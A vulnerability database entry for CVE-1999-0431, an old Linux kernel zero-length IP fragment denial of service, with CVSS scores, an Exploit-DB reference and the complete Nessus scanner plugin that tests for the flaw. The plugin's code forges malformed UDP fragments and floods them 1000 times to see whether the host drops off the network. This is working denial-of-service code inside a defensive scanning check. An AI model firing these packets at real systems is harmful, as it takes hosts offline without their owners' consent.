Vulnerabilities > CVE-1999-0431 - Unspecified vulnerability in Linux Kernel

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
linux
nessus
exploit available

Summary

Linux 2.2.3 and earlier allow a remote attacker to perform an IP fragmentation attack, causing a denial of service.

Vulnerable Configurations

Part Description Count
OS
Linux
190

Exploit-Db

description: Linux kernel 2.1.89/2.2.x Zero-Length Fragment Vulnerability. CVE-1999-0431. DoS exploit for Linux platform
id: EDB-ID:20566
last seen: 2016-02-02
modified: 1997-12-08
published: 1997-12-08
reporter: John McDonald
source: https://www.exploit-db.com/download/20566/
title: Linux kernel 2.1.89/2.2.x Zero-Length Fragment Vulnerability

Nessus

NASL family: Denial of Service
NASL id: LINUX_ZERO_LEN_FRAGMENT.NASL
description: The remote host appears to be using a Linux kernel that contains a flaw in its IP fragment handling code. By sending a series of packets with 0 length fragments, an unauthenticated attacker may be able to disable the remote host's IP connectivity.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10134
published: 1999-06-22
reporter: This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/10134
title: Linux 2.1.89 - 2.2.3 IP Fragmenting Functionality 0 Length Fragment Handling Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  # Registration pass: the scanner runs the script with `description` set to
  # collect metadata only. Nothing is sent to a target from this branch, and
  # the exit(0) at the bottom ends the pass.

  # Plugin identity and revision.
  script_id(10134);
  script_version("1.42");
  script_cvs_date("Date: 2019/03/06 18:38:55");

  # Advisory cross-references.
  script_cve_id("CVE-1999-0431");
  script_bugtraq_id(2247);

  script_name(english:"Linux 2.1.89 - 2.2.3 IP Fragmenting Functionality 0 Length Fragment Handling Remote DoS");
  script_summary(english:"Disables networking connectivity on the remote host");

  # Report text shown to the operator.
  script_set_attribute(attribute:"synopsis", value:"The remote host is prone to a denial of service attack.");
  script_set_attribute(attribute:"description", value:
"The remote host appears to be using a Linux kernel that contains a
flaw in its IP fragment handling code. By sending a series of packets
with 0 length fragments, an unauthenticated attacker may be able to
disable the remote host's IP connectivity.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Mar/149");
  script_set_attribute(attribute:"solution", value:"Upgrade to Linux kernel version 2.2.4 or later.");

  # Scoring: network-reachable, no authentication, availability impact only.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"1999/03/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");

  # "potential_vulnerability" marks the finding as unconfirmed; it is paired
  # with the Settings/ParanoidReport requirement further down.
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:linux:kernel");
  script_end_attributes();

  # ACT_KILL_HOST is the destructive category: the check works by trying to
  # take the target off the network, so it belongs only in scan policies
  # that explicitly allow unsafe checks.
  script_category(ACT_KILL_HOST);

  script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");
  script_family(english:"Denial of Service");

  # Scheduling: run after OS fingerprinting (the script body reads Host/OS)
  # and only when the paranoid-report setting is present in the KB.
  script_dependencies("os_fingerprint.nasl");
  script_require_keys("Settings/ParanoidReport");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");

# Pre-flight gates. Order matters: the first two leave silently with exit(0),
# the last one leaves through audit().

# The packets forged later in this script are IPv4 (ip_v: 4), so IPv6
# targets are skipped.
if (TARGET_IS_IPV6)
{
  exit(0);
}

# Skip hosts whose fingerprint is known and does not mention Linux.
# An empty or missing Host/OS entry does NOT exit here, so hosts that were
# never fingerprinted still reach the destructive part of the check.
os = get_kb_item("Host/OS");
if (os)
{
  if ("Linux" >!< os) exit(0);
}

# Only proceed when report paranoia is 2 or higher; otherwise bail out with
# the standard "paranoid" audit message.
if (report_paranoia < 2)
{
  audit(AUDIT_PARANOID);
}

# Destructive liveness test: bracket the packet burst with start_denial() /
# end_denial() and report the host if it no longer answers afterwards.
# NOTE(review): the verdict rests only on the host going quiet. Anything else
# that makes the target unreachable during the window (filtering, rate
# limiting, an unrelated outage) produces the same result, which is
# consistent with the plugin registering itself as a potential vulnerability.
start_denial();

# UDP source port used in all three forged datagrams
s = 56;
# UDP destination port used in all three forged datagrams
d = 16384;

# Fragment 1: 20-byte IP header (ip_hl 5) plus 32 bytes, "more fragments" set.
ip = forge_ip_packet(ip_v : 4,
                     ip_hl: 5,
                     ip_tos:0,
                     ip_id : 0x1234,
                     ip_ttl: 0x40,
                     ip_p  : IPPROTO_UDP,
                     ip_len:  20 + 32,
		     ip_src: compat::this_host(),
                     ip_off: IP_MF);
udp1 = forge_udp_packet(ip:ip, uh_sport:s, uh_dport:d, uh_ulen:56);

# Fragment 2: ip_len is forced to 20, i.e. header only, which is the
# zero-length fragment the advisory is about. update_ip_len:FALSE presumably
# stops forge_udp_packet() from recomputing that length (confirm against the
# NASL reference).
ip = set_ip_elements(ip : ip, ip_len : 20, ip_off : IP_MF);
udp2 = forge_udp_packet(ip:ip, uh_sport:s,uh_dport:d, uh_ulen:56,
                        update_ip_len:FALSE);
# Fragment 3: same size as the first, offset field 4, IP_MF not set.
ip = set_ip_elements(ip : ip, ip_len:32 + 20,ip_off:4);
udp3 = forge_udp_packet(ip:ip, uh_sport:s,uh_dport:d,uh_ulen:56);

# Send the three-fragment set 1000 times without capturing replies
# (pcap_active:FALSE), so nothing the host sends back is inspected here.
send_packet(udp1,udp2, udp3, pcap_active:FALSE) x 1000;

# Fixed 30-second wait before the liveness check.
sleep(30);

# end_denial() reports whether the target still responds.
alive = end_denial();

if(!alive){
  # Record the outage in the KB under Host/dead and raise the finding on
  # port 0/udp, since no particular service is involved.
  set_kb_item(name:"Host/dead", value:TRUE);
  security_warning(port:0, protocol:"udp");
}